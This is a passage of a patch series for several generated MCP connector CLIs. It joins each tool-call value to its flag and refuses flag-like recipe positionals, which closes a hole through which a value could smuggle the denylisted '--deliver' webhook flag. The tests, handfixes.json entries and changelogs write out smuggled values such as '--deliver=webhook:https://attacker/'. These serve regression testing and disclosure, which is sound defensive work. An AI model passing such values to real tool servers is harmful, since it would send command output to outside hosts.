+// beginning with "-" would be parsed by pflag as a flag - the same key-only
+// gap mcp-argv-value-joined closes for cliArgsFromMCP. Mirrors the rule in
+// cobratree.validatePositionalArgsForMCP.
+func rejectFlagLikeRecipeValue(name string, value any) error {
+	if s := recipeValueString(value); s != "-" && strings.HasPrefix(s, "-") {
+		return fmt.Errorf("flag-like value %q not allowed for %s; pass a plain value", s, name)
+	}
+	return nil
 }

--- a/skills/cork/cli/internal/mcp/recipe_intents_test.go
+++ b/skills/cork/cli/internal/mcp/recipe_intents_test.go
@@ -101,3 +101,32 @@ func recipeToolText(t *testing.T, result *mcplib.CallToolResult) string {
 	}
 	return text.Text
 }
+
+// TestRecipeIntentAnswerAnAdvisoryTheMomentACveIsNamedRejectsFlagLikePositional guards the hand-fix
+// mcp-recipe-argv-not-flag-like: a positional value that begins with "-"
+// would land in argv ahead of the recipe's own flags and be parsed by pflag
+// as a flag, so it must be refused before the CLI runs.
+func TestRecipeIntentAnswerAnAdvisoryTheMomentACveIsNamedRejectsFlagLikePositional(t *testing.T) {
+	oldPath, oldErr := recipeCLIPath, recipeCLIPathErr
+	t.Cleanup(func() {
+		recipeCLIPath, recipeCLIPathErr = oldPath, oldErr
+	})
+	recipeCLIPath = writeRecipeIntentRecorder(t)
+	recipeCLIPathErr = nil
+
+	for _, bad := range []string{"--deliver=webhook:https://x/", "--dry-run", "-x"} {
+		req := mcplib.CallToolRequest{Params: mcplib.CallToolParams{Arguments: map[string]any{
+			"slug": bad,
+		}}}
+		result, err := handleAnswerAnAdvisoryTheMomentACveIsNamed(context.Background(), req)
+		if err != nil {
+			t.Fatalf("handler returned transport error: %v", err)
+		}
+		if !result.IsError {
+			t.Fatalf("flag-like slug %q reached the CLI: %s", bad, recipeToolText(t, result))
+		}
+		if got := recipeToolText(t, result); !strings.Contains(got, "flag-like") {
+			t.Fatalf("unexpected error for flag-like slug %q: %s", bad, got)
+		}
+	}
+}

--- a/skills/cork/cli/internal/mcp/recipe_intents_test.go
+++ b/skills/cork/cli/internal/mcp/recipe_intents_test.go
@@ -130,3 +130,20 @@ func TestRecipeIntentAnswerAnAdvisoryTheMomentACveIsNamedRejectsFlagLikePosition
 		}
 	}
 }
+
+// TestRejectFlagLikeRecipeValueEdges pins the normalized rule of the hand-fix
+// mcp-recipe-argv-not-flag-like: leading whitespace is trimmed before the
+// check, the bare "-" is allowed, and a negative number is refused like any
+// other leading dash.
+func TestRejectFlagLikeRecipeValueEdges(t *testing.T) {
+	for _, bad := range []any{" --deliver=webhook:https://x/", "\t--dry-run", "  -x", "-5", float64(-5), "--"} {
+		if err := rejectFlagLikeRecipeValue("v", bad); err == nil {
+			t.Fatalf("flag-like value %#v was accepted", bad)
+		}
+	}
+	for _, ok := range []any{"-", "plain", " plain-value ", "a=b", float64(5), nil, ""} {
+		if err := rejectFlagLikeRecipeValue("v", ok); err != nil {
+			t.Fatalf("plain value %#v was refused: %v", ok, err)
+		}
+	}
+}

--- a/skills/cork/handfixes.json
+++ b/skills/cork/handfixes.json
@@ -263,6 +263,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/cork/handfixes.json
+++ b/skills/cork/handfixes.json
@@ -314,7 +314,7 @@
   },
   {
    "id": "mcp-recipe-argv-not-flag-like",
-   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs. (1 guarded call site(s); the ledger requires all of them.)",
    "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
    "status": "active",
    "asserts": [
@@ -343,6 +343,18 @@
     {
      "file": "cli/internal/mcp/recipe_intents_test.go",
      "contains": "RejectsFlagLikePositional(",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "if s := recipeValueString(value); s != \"-\" && strings.HasPrefix(s, \"-\") {",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/recipe_intents_test.go",
+     "contains": "func TestRejectFlagLikeRecipeValueEdges(",
      "min_count": 1,
      "code_only": true
     }

--- a/skills/cork/handfixes.json
+++ b/skills/cork/handfixes.json
@@ -278,8 +278,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -289,7 +301,50 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "func rejectFlagLikeRecipeValue(",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "if err := rejectFlagLikeRecipeValue(",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/recipe_intents_test.go",
+     "contains": "RejectsFlagLikePositional(",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/cove/CHANGELOG.md
+++ b/skills/cove/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/cove/CHANGELOG.md
+++ b/skills/cove/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.7]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.6] - 2026-08-26
 
 ### Fixed

--- a/skills/cove/CHANGELOG.md
+++ b/skills/cove/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.6] - 2026-08-26
 

--- a/skills/cove/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/cove/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/cove/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/cove/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/cove/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/cove/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/cove/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/cove/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/cove/cli/internal/mcp/intents.go
+++ b/skills/cove/cli/internal/mcp/intents.go
@@ -74,10 +74,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {

--- a/skills/cove/handfixes.json
+++ b/skills/cove/handfixes.json
@@ -256,6 +256,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/cove/handfixes.json
+++ b/skills/cove/handfixes.json
@@ -271,8 +271,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -282,7 +294,32 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
     }
    ]
   }

--- a/skills/crowdstrike/CHANGELOG.md
+++ b/skills/crowdstrike/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01
 

--- a/skills/crowdstrike/CHANGELOG.md
+++ b/skills/crowdstrike/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-09-01
 
 ### Added

--- a/skills/crowdstrike/CHANGELOG.md
+++ b/skills/crowdstrike/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01

--- a/skills/crowdstrike/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/crowdstrike/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/crowdstrike/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/crowdstrike/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
